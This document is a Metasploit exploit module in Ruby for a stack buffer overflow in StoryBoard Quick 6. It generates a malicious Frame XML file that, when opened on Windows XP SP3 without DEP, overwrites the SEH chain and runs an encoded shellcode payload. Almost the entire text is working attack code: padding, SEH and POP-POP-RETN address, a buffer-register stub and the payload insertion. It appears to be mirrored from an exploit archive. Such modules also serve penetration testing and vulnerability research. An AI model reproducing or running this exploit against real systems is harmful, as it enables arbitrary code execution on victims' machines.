require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'StoryBoard Quick 6 Memory Corruption Vulnerability', 'Description' => %q{ This module exploits a stack-based buffer overflow in StoryBoard Quick 6. }, 'License' => MSF_LICENSE, 'Author' => [ 'vt [nick.freeman@security-assessment.com]' ], 'Version' => '$Revision: 10394 $', 'References' => [ [ 'URL', 'http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX', } }, 'Platform' => 'win', 'Targets' => [ [ 'Default (WinXP SP3 No DEP)', { } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 30 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', "Frame-001.xml"]), ], self.class) end def exploit template = %Q| ID 1 Objects Size-X 134.00000000 Size-Y 667.00000000 Type cLIB Library C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid ID AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAREPLACE_1BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBB.xo Colorization Arms ff4b70ff Eyes ff00ff00 Hair ff68502d Face fffdd8a1 REPLACE_2 ff070707 Skin ffd7b583 Legs ff06007e Whom LINDA Scale-X 0.74842578 Scale-Y 0.74842578 Offset-Y 41.60000610 Size-X 310.00000000 Size-Y 575.00000000 Type cLIB Library C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 2.artgrid ID 30012.xo Colorization Arms ff909090 Eyes ff00ff00 Hair ff090909 Face ffff0837 Shoe ff1100c2 Skin ffb78d4f Legs ff050505 Whom C.J. Scale-X 0.86817396 Scale-Y 0.86817396 Offset-Y 41.60000610 IsSelected REPLACE_3 Size-X 682.00000000 Size-Y 565.00000000 Type cLIB Library C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid ID 30013.xo Colorization Arms ff4b70ff Eyes ff00ff00 Hair ff68502d Face fffdd8a1 Shoe ff070707 Skin ffd7b583 Legs ff06007e Whom LINDA Scale-X 0.95718473 Scale-Y 0.95718473 Offset-Y 62.40469360 FrameDB TXT-0006 MDYvMDMvMTEgMjM6Mjg6MDMA UN-Thumb | sploit = template.gsub(/REPLACE_1/, "\xd9\xcf\xe5\x74") padd = "\x43" * 4256 nseh = "\x90\xeb\x06\x90" seh = "\x25\x12\xd1\x72" # POP, POP, RETN nops = "\x90"*9 # set buffer register bufregstub = "\x8b\xc4" # mov eax, esp bufregstub += "\x33\xc9" # xor ecx bufregstub += "\x83\xc1\x7f" # add ecx, 7f bufregstub += "\x6b\xc9\x17" # imul ecx,17 bufregstub += "\x83\xc1\x7b" # add ecx,7b bufregstub += "\x03\xc1" # add eax,ecx # eax now points to buffer, ready to decode shellcode. sploit = sploit.gsub(/REPLACE_2/,padd + nseh + seh + nops + bufregstub + payload.encoded + ("\x44"*(11137-payload.encoded.length))) sploit = sploit.gsub(/REPLACE_3/, "\x45"*658) print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end end # Iranian Exploit DataBase = http://IeDb.Ir [2013-11-06]